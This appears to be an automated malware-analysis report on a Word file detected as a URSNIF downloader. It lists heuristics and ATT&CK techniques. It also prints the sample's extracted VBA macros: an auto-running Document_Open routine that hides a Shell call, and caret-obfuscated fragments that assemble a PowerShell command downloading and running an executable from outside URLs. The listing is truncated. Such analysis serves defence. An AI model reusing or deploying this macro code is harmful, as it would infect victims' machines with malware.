MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function to execute a command. The script attempts to construct a complex command string, likely for downloading and executing a secondary payload. The ClamAV detection as 'Doc.Downloader.URSNIF-6729855-3' further supports its role as a downloader.
Heuristics 6
-
ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4597 bytes |
SHA-256: e6d422b0443ddcc2c7b1e09bb4703ed302d68370e6021d281be8c4da9c50c18b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "JmmtciF"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Shell Format(hfAoGiJ) + wUwQNzcIcIfCXZ + nSfVpLN + juCzi + KEhViw + wdCLVIFzT + mmRkEMcmnhKF, vbHide
End Sub
Attribute VB_Name = "iSPdhHkG"
Function juCzi()
On _
Error _
Resume _
Next
Month "UpmbmZpnA" + "6766"
Month "7083" + "wJ" + "7945" + "3124"
Month "4157" + "Y" + "qqi" + "Vij"
Month "9790" + "lToM"
Month "c" + "F"
MqCjRwG = Chr(4 + 10 + 15 + 2 + 68) + "md" + " /V" + ":/" + Chr(3 + 7 + 10 + 2 + 45) + Chr(1 + 3 + 4 + 0 + 26) + "s^e^t " + "9^" + "P=^ ^" + " ^ " + " ^ " + " ^ ^ " + "^ ^ ^" + " ^ }"
Month "hOMnHhn" + "ptBSpPETPY" + "T" + "aiWo"
Month "190699170" + "CvGk"
Month "An" + "3996" + "5077" + "286688474"
RpnhfkiKc = "^}^{h" + Chr(4 + 10 + 15 + 2 + 68) + "^" + "t" + "a" + Chr(4 + 10 + 15 + 2 + 68) + "}^;" + "^k" + "a^er^" + "b^;" + "w^lK$" + " ^me^tI" + "^-" + "^ekovn^" + "I^;" + ")^w^l"
Month "oDfGXzRjT" + "vJl" + "RzwHjp" + "QjkmiIjEp"
Month "vTjAnjD" + "4839"
Month "9050" + "511157874" + "I" + "262338199"
wJwQrVFUwid = "K^" + "$^ ^," + "^i^au" + "$(e" + "^liF" + "^da^o^l" + "n^wo^D" + ".^"
Month "4792" + "lV" + "48900262" + "D"
Month "j" + "286974041" + "hzXU" + "1314"
Month "ookb" + "HKOSzQKQ"
djzUsiklE = "i" + Chr(4 + 10 + 15 + 2 + 68) + "^" + "G$^{yr" + "t{)^K" + "^sV" + "^" + "$^ n^i^" + " ^i^a" + "u$(^h" + Chr(4 + 10 + 15 + 2 + 68) + "^aero" + "^f"
Month "qtUdBNFdom" + "498" + "zNVM" + "sMOzUh"
Month "w" + "DFmFn"
Month "zHiA" + "TbiH" + "472669434" + "rLMAwlkRDoz"
WMACKw = ";'e^xe" + "^.^'+D^" + "f" + "^" + "Q^$^+" + "'\'^+" + Chr(4 + 10 + 15 + 2 + 68) + "il^bup"
Month "5969" + "414592477"
Month "j" + "643"
Month "15831636" + "zq" + "207549787" + "zRFQNifatn"
tkAEknLmnLA = ":vne^" + "$=" + "^w^l" + "K^$" + ";^'1" + "^9^3'^ "
Month "503493470" + "251520882"
Month "4251" + "228956468"
uNIda = "=^ ^DfQ" + "^$^;)" + "^'" + "@'(" + "t^il"
juCzi = MqCjRwG + RpnhfkiKc + wJwQrVFUwid + djzUsiklE + WMACKw + tkAEknLmnLA + uNIda
Month "WGUBnjo" + "1033" + "jwiokpRiQDruG" + "4155"
Month "1926" + "RzzYn" + "iki" + "oiOCb"
Month "1368" + "DEqKBjC" + "wQ" + "HCfo"
Month "dL" + "PDrqDWj" + "rKCi" + "9644"
End Function
Function KEhViw()
On _
Error _
Resume _
Next
Month "350544414" + "350311002"
Month "388659103" + "zTANAHiCF" + "4625" + "lN"
Month "iO" + "498958133" + "wsqA" + "i"
hdPlkzw = "p^S" + "^.^'nkt" + "^.9b^" + "k^o^=^l" + "^?p^" + "h^p." + "^t^ok^s" + "na"
Month "V" + "dVj"
Month "645" + "inEQkwR"
YzRDvMWFFpC = "p" + "^o/^TT" + "R/^mo" + Chr(4 + 10 + 15 + 2 + 68) + ".^" + "7" + "h^" + "te^6"
Month "MwKWOjo" + "23106801"
Month "ZjoC" + "526028289" + "jjazH" + "a"
Month "ja" + "1400"
Month "oftz" + "1600"
jpDfa = "^jm^jd" + "^1wtr" + "^y//^:" + "p" + "tth'" + "^" + "=^KsV" + "^$^;t"
Month "SYJiHYomZz" + "os"
Month "t" + "ibraOzKRqSljt"
Month "qzfmioY" + "hnhJ" + "cHIsCMWH" + "337144930"
Month "iwkz" + "DRvoK" + "QEv" + "267085738"
sTdXkOWvQs = "nei" + "l" + Chr(3 + 7 + 10 + 2 + 45) + "^b^" + "eW^.^" + "t^eN^ t" + Chr(4 + 10 + 15 + 2 + 68) + "^ejb" + "o^-^w^e" + "n=i" + Chr(4 + 10 + 15 + 2 + 68) + "^" + "G$ ^l^" + "l^e^hsr" + "^ew^" + "o"
Month "BnzqJ" + "462456220" + "343427415" + "QstziLDN"
Month "353240879" + "TccIdDjm"
Month "MwJH" + "96352812"
LndZRbnNER = "^p&" + "&^f^or " + "/^L " + "%^Q ^in" + " (^" + "26^3;" + "^-" + "^1;"
Month "380849459" + "b" + "70822146" + "HLCkoKwh"
Month "407717244" + "zOdVrM"
CvwQoW = "^0)d^" + "o" + " " + "se^t ^" + "4r^B" + "=" + "!^4r^B!"
Month "390950992" + "zzEKDMdSilhzAb"
Month "hQro" + "iWTT" + "8106062" + "ijdR"
Month "215383337" + "144572651" + "823" + "6418"
zZYbI = "!9" + "^P:" + "~%^Q,1!" + "&" + "&^if %^"
Month "299703056" + "c"
Month "2036" + "
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.